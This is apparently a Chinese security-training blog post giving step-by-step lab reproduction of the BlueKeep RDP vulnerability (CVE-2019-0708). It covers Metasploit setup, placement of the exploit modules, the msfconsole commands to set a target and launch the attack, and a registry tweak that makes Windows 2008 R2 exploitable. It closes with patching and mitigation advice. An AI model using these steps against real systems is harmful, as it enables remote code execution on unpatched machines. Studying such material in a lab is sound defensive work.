Cve-2019-0708超详细复现文章【附视频演示】

v2-77b78b3166d7e0a9233e914856da0024_b.jpg



又是在一个美好忙碌的周末,0708的exp也悄悄地来了,大晚上的给0708刷屏,我太难了,美好的一个休息日何必呢!(内心:666,exp来了快搞一波)

v2-6a1c8d913cbbdca431b6b76cebc41eac_b.jpg



那天的如何挖掘信息泄密的推文里有个小伙伴还提到0708的exp
(想学习相关骚姿势的可以移步下一篇,但是请给我先看完这篇!!)

v2-aa6eca8d8884b5419a0dd37781649dc8_b.jpg



那么我秉持着白帽的精神(顶着年纪轻轻秃头的风险)给大家分享一篇0708exp超详细复现步骤吧!

v2-61530e0a6a5c9314a55315beabed61f6_b.jpg



首先前期环境准备,我这边用的是


kali 4.17.0
Windows 2008 r2

工具准备:
先使用下面的命令一键安装metasploit-framework


curl
raw.githubusercontent.com > msfinstall && chmod 755 msfinstall && ./msfinstall

然后下载Reference中的攻击套件放置文件到msf的相应文件夹(攻击套件可在破壳学院gzh后台回复0708获取下载地址)

v2-bcc595469480167f07314cc562747033_b.jpg



下载出来的攻击套件可以使用vmtools的复制粘贴功能复制到kali中,也可以使用scp命令进行上传(前提是kali开启了ssh连接)

v2-6fb3505b9a7466d844ea39868340ada4_b.jpg



将压缩包解压后里面有4个rd文件

v2-699c8157064a6bf960096c8d6445843e_b.jpg



这边在将这4个文件移动到对应的目录下(注意第四个rdp文件夹需要自己创建可以使用mkdir进行创建文件夹)

rdp.rb →→→

  • /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb →→→

  • /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb


cve_2019_0708_bluekeep.rb →→→

  • /opt/metasploitframework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb →→→

  • /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb


前戏做的差不多了,开始步入主题

v2-f4482a3590923d4381cef77a7d836f6b_b.jpg



输入msfconsole进入metasploit-framework
(注意这边是msf5,不是的看回前期准备)

v2-c6f5f5ceae780115004ae890e4d44636_b.jpg


进入后使用reload_all加载出0708rdp的利用模块

v2-643b31b0680ffc007f9379107868345c_b.jpg


使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

v2-22bb67d8435b56f334c9a397fcf7ae81_b.jpg


再使用set RHOSTS靶机IP设置攻击IP和目标端口

v2-5bde31d5deb09fd6b6be8c1144ad8942_b.jpg


接下来使用set target ID(0-4)设置攻击机器架构
听破壳渣男P某(破壳老师)说用target 2很稳

v2-741b9b6db88d12c335056c51bdfe61aa_b.jpg


那就暂且信他一会,所以用target 2

v2-1f6c79f7e209b794e2b3a83a30603286_b.jpg


最后使用exploit开始攻击,等待建立连接

v2-98b932a483a31be63b2ad92ac22a0f12_b.jpg


注意:
Windows 2008 r2需要修改注册表才能复现成功(win7不用)

[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStations dpwdDisableCam]值修改为0


修复方法
2019年5月14日微软官方已经发布安全补丁,请大家及时下载并安装补丁程序。

参考链接:
portal.msrc.microsoft.com

support.microsoft.com/z


针对无补丁或暂时不能安装补丁的系统,可使用以下方法:

1. Windows 7、Windows Server 2008 系统上启用网络级身份验证 (NLA)

2. 暂时关闭远程桌面服务(RDP)

v2-5407c23db8c074e17246eb316c25e866_b.jpg


最后最最最重要的环节来啦!!这里奉上CVE-2019-0708漏洞演示视频


声明:切勿对公网正常运作的服务器进行非法攻击,复现请使用靶机等环境进行复现,若出现一切违法行为,与破壳学院无关。
——————————————————————————————————————
觉得不错的点赞、点赞、点赞!!
更多网络安全知识学习请关注公众号:破壳学院

后台回复“0708”获Reference中的攻击套件

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值